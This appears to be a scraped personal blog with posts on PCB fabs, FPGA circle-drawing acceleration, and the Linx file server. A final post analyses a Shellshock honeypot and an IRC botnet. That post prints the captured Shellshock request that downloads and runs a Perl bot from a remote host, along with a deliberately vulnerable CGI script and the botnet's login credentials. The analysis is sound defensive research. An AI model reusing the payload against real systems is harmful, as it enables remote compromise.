Overall, small PCBs are pretty cheap. I think Seeed will offer slightly higher quality for a similar price. Dirty PCB's will charge less for other options like color and stencils and will be quicker out of the board house.

If you PCB design isn't crazy on tolerances you can't go wrong with either one.

** Update

Based on replies I've gotten, here are some other places to check out for maxing out cheapness and quality:

Check out PCBshopper.com to query the price of most fabs for a given board.

/

Never miss a post

How to accelerate a program using hardware

The Challenge

One of my recent final projects in school was to take a given software program and make it as fast as possible while still being functionally correct. It was graded based on speed and how it ranked against each solution in the class.

Here I will show you how to incrementally find bottlenecks in software and replace them with hardware components.

The Specification

For those not familiar with what an field programmable gate array (FPGA) is, it's a chip made up of various programmable memories, logic cells, look up tables, and interconnect that can be configured to be functionally equivalent to near any digital design that will fit on it.

I could make a MIPS processor connected to a custom accelerated HDMI controller. Then I could reprogram it to be a simple counter circuit. This is quite useful for digital design.

For the challenge to be fair, it had to run on an Altera Cyclone IV FPGA. It had to be timed with a 50 MHz timer (also configured onto the FPGA) to get a consistent benchmark. And it had to be functionally correct. That's it.

The Program

We had to implement a program that could draw 50 randomly generated circles on a shared memory. We were given a reference C design that ran on a RISC 32 bit processor. It completes in 14,892,988 cycles.

Here is the reference function for drawing one circle. Don't try to understand the functionally - try to find areas where the processor would spend most of its time (bottlenecks).

// This is called 50 times
void plotcircle(unsigned cx, unsigned cy, unsigned r) {
    int x, y;
    int xp;
    x   = r;
    y   = 0;
    xp  = 1 - (int) r;
    while (x >= y) {
        setpixel(cx + x, cy + y);
        setpixel(cx + x, cy - y);
        setpixel(cx - x, cy + y);
        setpixel(cx - x, cy - y);
        setpixel(cx + y, cy + x);
        setpixel(cx + y, cy - x);
        setpixel(cx - y, cy + x);
        setpixel(cx - y, cy - x);
        y   = y + 1;
        if (xp < 0)
            xp += (2*y + 1);
        else {
            x = x - 1;
            xp += 2*(y-x) + 1;
        }
    }
}

This reference implements the Bresenham circle drawing algorithm [PDF].

Since we can accelerate using hardware, here is diagram of the reference architecture.

A simple processor runs the C code and connects to program memory (for .bss, .text, stack, etc.) and a separate memory for drawing the circles. It runs on a 50 MHz clock and is timed by a 50 MHz timer.

Accelerating

Do you have any ideas? Here is what I thought of.

setpixel(...)

My first thought that a bottleneck would be in the setpixel(...) function. It's called eight times for each iteration of the loop. And don't forget to multiply that by 50 because there's 50 circles to plot. So perhaps by accelerating this small part of the design we could get a large speed up.

So let's see how we can call this function only once per iteration of the loop. We can write a small coprocessor in verilog to do these 8 writes really fast and in parallel with this calculation:

y   = y + 1;
if (xp < 0)
xp += (2*y + 1);
else {
    x = x - 1;
    xp += 2*(y-x) + 1;
}

Since the coprocessor is in hardware, it can easily do the cx+x, cy+y, cy - y, ... calculations simultaneously and fast enough to get 8 writes in 8 clock cycles.

Now here is the new architecture:

The coprocessor sits between the memory and the main processor transparently and acts just like a memory as far as the main processor can tell. But the coprocessor is doing 8 writes to the pixel memory for each write from the main processor to achieve the acceleration. If you're interested, here is semi-correct verilog I pulled from my git history.

Here is the new C code to interface with the coprocessor:

#define SET_RADIUS(cx,cy,r) ((*(volatile unsigned *) PIX_MEM) = ((r<<18)|(cy<<9)|cx)
#define SET_PIXELS(x,y) ((*(volatile unsigned *) PIX_MEM+4) = (y<<9)|x)

// called 50 times
void plotcircle_hw(int circle, unsigned cx, unsigned cy, unsigned r) {
    int x, y;
    int xp;
    SET_RADIUS(cx,cy,r);
    x   = r;
    y   = 0;
    xp  = 1 - (int) r;
    int i = 0;
    while (x >= y) {
        SET_PIXELS(x,y);    // acceleration
        y   = y + 1;
        if (xp < 0)
            xp += (2*y + 1);
        else {
            x = x - 1;
            xp += 2*(y-x) + 1;
        }
    }
}

The coprocessor is mapped to the location defined by PIX_MEM so that is where it writes to. The design is now doing only 1 write (SET_PIXELS) and 16 less arithmetic calculations per iteration of the loop. After running the new design, I found there is about a 40x speedup over the reference. Awesome. Now how can we make it faster?

Drawing Circles in Parallel

Despite the 40x times speedup, it is still drawing 50 circles sequentially. If it could draw all of them at the same time, then it could ideally expect a 50 40 = 2000x speedup right? But this can be difficult because it's writing to a shared* memory. It can't do 50 writes at the same time to one memory.

As far as I know, 50 port memories cannot synthesize for the FPGA. But we can write to 50 different memories at the same time! It's space intensive, but we are designing purely for speed.

The idea here is we can make an individual memory for each circle to be plotted on. And when reads occur, the coprocessor will read from all memories simultaneously and OR them together.

That way, the main processor still thinks it's a regular memory with 50 circles plotted on it.

Here is the new architecture (and coprocessor verilog for those that are interested):

Note that this design also implements the rest of the circle drawing algorithm in hardware. All it needs is the center point and radius to start drawing a circle. Here is the little new C code:

#define SET_RADIUS(c,x,y,r) (*(volatile unsigned *) PIX_MEM = ((c<<26)|(r<<18)|(y<<9)|x))

// called 50 times
void plotcircle_hw(int circle_index, unsigned cx, unsigned cy, unsigned r) {
        SET_RADIUS(circle_index,cx,cy,r);
}

It writes to the memory mapped coprocessor the circle index (1 to 50), center point, and radius.

Now what is the speedup?

Unfortunately this does not yield the ideal extra 50x speedup. First off, there wasn't enough room on the board for 50 individual memories - there was only room for 12.

Second, after calling plotcircle_hw(...) 50 times, we need a small delay. This is to wait for the hardware processors finish plotting.

After testing for correctness, the design achieves a 600x total speedup! That's pretty sweet, but there's still a lot more we can do!

Read from program memory in hardware

Let's take a look at the current system for the bottleneck. What is the main processor doing? It's calling SET_RADIUS(...) 50 times. That's 50 writes each with an assortment of shift's and or's to put the arguments into a word.

#define SET_RADIUS(c,x,y,r) (*(volatile unsigned *) PIX_MEM = ((c<<26)|(r<<18)|(y<<9)|x))

We can do this in hardware instead. Let's add a dual port on the program memory to give the coprocessor direct access to it. Also, since we're delaying for the hardware modules to finish, let's increase their clock inputs to 100 MHz!

Coprocessor verilog

Now here is the minimal C code:

#define PIX_BUSY (*(volatile unsigned *)PIX_MEM+4)
#define PIX_WSTART (*(volatile unsigned *)PIX_MEM)

// called once
void plotallcircles_hw() {
    PIX_WSTART = (unsigned)stack_address_of_global_circle_data_array;
    while(PIX_BUSY);
}

It writes the stack address of where the generated circle coordinates and radii are located. Now the coprocessor will do the reads on its own. The C program reads from PIX_BUSY which is a control signal to indicate when all circles finish plotting. Also note that function is only called once instead of 50 times.

The speedup was now about 5000x more than the reference design.

In the reference, it did 8 writes and about 20-24 arithmetic instructions for each iteration of a loop that varied between 0-202 iterations. It did all of that 50 times.

Now in the fully accelerated design, it just does one write and polls the hardware for when it's done. The 5000x speed up is expected.

Conclusion

Hardware acceleration is an iterative process and warrants a good understanding of the overall architecture and its bottlenecks. Plus it's not always required to get as much speed as possible. The final design here would be expensive to implement in practice. It could be acceptable to stop at any of the iterations above for many projects.

This was a fun project and improving the performance of a program is a satisfying experience. If you got any ideas for how to make it even faster be sure to let me know.

Thanks to Dr. Schaumont for an awesome class and project. Check out the results and details of the project, as well as past years.

/

Never miss a post

Linx: the filesharing server every hacker should know about

Linx

Many file sharing servers already exist; a lot of them come and go. Services Google Drive and Drop Box are the big ones. Also there's have more lightweight options like pastebin or python -m SimpleHTTPServer.

Linx is a recent, open source file sharing server that I've recently started using. It makes it easy for sharing files or quickly written scripts that won't be tied to any public account. It's also nice if I'm hacking on a project and don't want to deal with setting up large web scale file storing accounts/API's (AWS, Firebase, etc).

So Linx really sticks out for the following reasons:

  • It's written in Go (which seems to be a plus these days).
  • Has a built in API that is as simple as a file sharing API should be.
  • It supports displaying common file types with proper syntax highlighting if needed:
    • jpg, pdf, txt, c, python, shell, contents of compressed files, etc.
  • No user accounts or bullshit. Basic anonymity is attained with randomized filenames and file expirations.
  • It's open source and was designed for other people to run.

Setting up your own Linx server

Right now I'm running my own Linx server on one of my Digital Ocean instances.

It was pretty easy to set up since there are builds for all majors platforms (except mobile). It has all the configuration details I care about and nothing more. For my setup, I have it sitting behind my Nginx server with fast-cgi and HTTPS.

Easiest way to setup (64-bit Linux):

wget https://github.com/andreimarcu/linx-server/releases/download/v1.1.4/linx-server-v1.1.4_linux-amd64
./linx-server-v1.1.4_linux-amd64

You should pick out the build for your system and try it out. If you're setting up your own Linx server for real, make sure you cover a couple configurations:

./linx-server -bind 0.0.0.0:8080 \
  -siteurl "http://0x123.xyz/" \
  -remoteuploads \
  -maxsize 1048576

If you want Linx to be public, you should tell it to bind to 0.0.0.0. It's also very important to let Linx know the siteurl - not only so Linx can correctly generate links, but also to prevent hotlinking by checking the origin or referer.

Hotlinking is sometimes a serious problem that small services face. As we can see from The Oatmeal, it can seriously increase server bills.

seriously increase server bills

Wouldn't have been a problem if the image was hosted with Linx!

More features of Linx:

  • Built in https/TLS server
  • API key authentication and generation
  • Content security policies
  • HTTP proxy support
  • Torrenting support

Demo

Check out linx.li!

Conclusion

Linx has everything I want from a file sharing server. If there's something that's missing, you should contribute.

/

Never miss a post

A close look at an operating botnet

For those that don't know, a botnet is a network of hacked computers that somehow connect back to a command and control server which instructs the network to conduct malicious activities like DDOS attacks, phishing, or spam.

What happened

This past summer, I decided to set up a honey pot server. I hadn't done something like that before and I was curious to see what would show up.

I set up a fresh Digital Ocean instance and installed a vulnerability that could be remotely exploited. I choose to use the shellshock) bug and installed an older version of bash. Shellshock was a vulnerability in Bash that would execute code in a environment variable. This can easily be exploited remotely because of how CGI web servers pass arguments through environment variables.

After installing Bash 4.2, I set up an Apache web server to serve CGI. So common URL's and 404's would all map to one simple, shellshock-vulnerable script:

#!/bin/bash
echo -e "Content-type:text/html\r\n\r\n"
echo "Hi $HTTP_USER_AGENT"

Functionally the script just returns a text page saying hi to whatever the user agent string was. But if an HTTP request were to look something like this:

GET /hello HTTP/1.1
Host:        104.131.107.238
User-Agent:  () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://23.229.121.189/ex;curl -O http://23.229.121.189/ex;wget http://23.229.121.189/ex;perl /tmp/ex*;perl ex;rm -rf /tmp/ex*"

Then Bash 4.2 will execute the code in the User-Agent string, which downloads a Perl script, ex, and runs it.

This after leaving the server running for a couple months, that is exactly what happened.

Analysis

To summarize the Perl script, it's about 500 lines, connects to a server, wileful.com, and listens for commands. Some of the commands it looks for include tcpflood, eval, and shell. This looks like functionality for a botnet bot.

It also implements some stealth. Upon running the program, it immediately forks a /usr/sbin/httpd process, overwrites it with the Perl process using exec, and detaches from the parent process so it can run independently in the background.

So you won't be able to see a new perl process running. Instead, a new /usr/sbin/httpd process will be running.

root@b0b6000146fa:~# perl ex
root@b0b6000146fa:~# ps aux |grep perl
root        31  0.0  0.0   8860   648 ?        S+   16:30   0:00 grep --color=auto perl
root@b0b6000146fa:~# ps aux |grep httpd
root        29  0.0  0.0  24516  3856 ?        S    16:30   0:00 /usr/sbin/httpd
root        33  0.0  0.0   8860   644 ?        S+   16:30   0:00 grep --color=auto httpd

If you check the CPU usage of processes, however, /usr/sbin/httpd sticks out like a sore thumb because it polls the server socket with no timeout after it connects. This spins the CPU (oops).

# Output from top
  PID USER      PR  NI    VIRT    RES    SHR S   %CPU %MEM     TIME+    COMMAND
  8440 root     20   0   24984   3696    408 R   99.9  0.7     1921:38  /usr/sbin/httpd

I wanted to see what the program communicated with the server so I put it in a docker container and ran tcpdump. After it initially connected with the server, these messages were sent:

# Bot  (5.9.118.150 is wileful.com)
USER GNU 104.131.107.238 5.9.118.150 :GN
PASS swedenrocks
# Server
:Unreal.conf NOTICE AUTH :*** Looking up your hostname...
:Unreal.conf NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:Unreal.conf 433 * GNU :Nickname is already in use.
NICK GNU4387
# Server
PING :DEFB9868
# Bot
PONG :DEFB9868
# Server
:Unreal.conf 001 GNU4387 :Welcome to the XpowerHost IRC Network GNU4387!GNU@104.131.107.238
:Unreal.conf 002 GNU4387 :Your host is Unreal.conf, running version Unreal3.2.10.5
:Unreal.conf 003 GNU4387 :This server was created Mon Sep 28 2015 at 20:41:48 EDT

Some of you may immediately recognize this as IRC. This botnet seems kind of old school: no SSL and controlled over IRC.

Well it looks like I have a username, password, and server address. Why don't I try logging into the botnet with a regular IRC client?

I fired up another docker instance, Weechat, and a tor proxy. After connecting to irc://GNU:swedenrocks@wileful.com:443, this is what I saw:

Connected to botnet

Wow, there's a total of 977 connected 'users' and 6 different channels. As seen from tcpdump, my bot was instructed to join channel #113 so I figured I would do the same:

Channel #113

Either all 932 clients in the channel are pretty unoriginal when coming up with a nick or the bots are assigned a nick formatted like GNU<ID>. Everyone is really shy too, because no one says anything. After idling in the channel for a few minutes, this is all to be seen:

Just leaving and joining

Looks like bots are actively leaving and joining. I suspect that the operaters were moving around the bots or were continually exploiting shellshock vulnerable machines like my honey pot.

I wanted to see if I could send commands to the botnet since I had access to the channels, but after a couple hours of unfurling the perl script, I discovered that it authenticates commands based on the servername and nickname in the IRC message. I could not spoof this since it was something only an operator on the IRC network could do.

Back to the infected honey pot

I let my infected honey pot run for a few days and I checked out the IRC tranactions in the pcap logs. On intervals it would do the following:

  • Download a script to send emails with attachments.
  • Download a list of email addresses.
  • Run the script with the list of emails and possibly other files.

This is probably for phishing attacks or spam. No DOS attacks.

Conclusion

I didn't want my honey pot to be contributing to illegal activities, so I shut it down.

It wasn't long before I couldn't log in to the IRC network on wileful.com.

No more access

At first I thought I got locked out, but after scanning it from multiple different IP addresses I never used before, it was still unresponsive. I suspect that the botnet moved to another server or stopped accepting new connections.

My setup for the honey pot and my results from this analysis can be found here. If you have any similar experience with this or know more, please send me a message. I'd like to learn more.

/

Never miss a post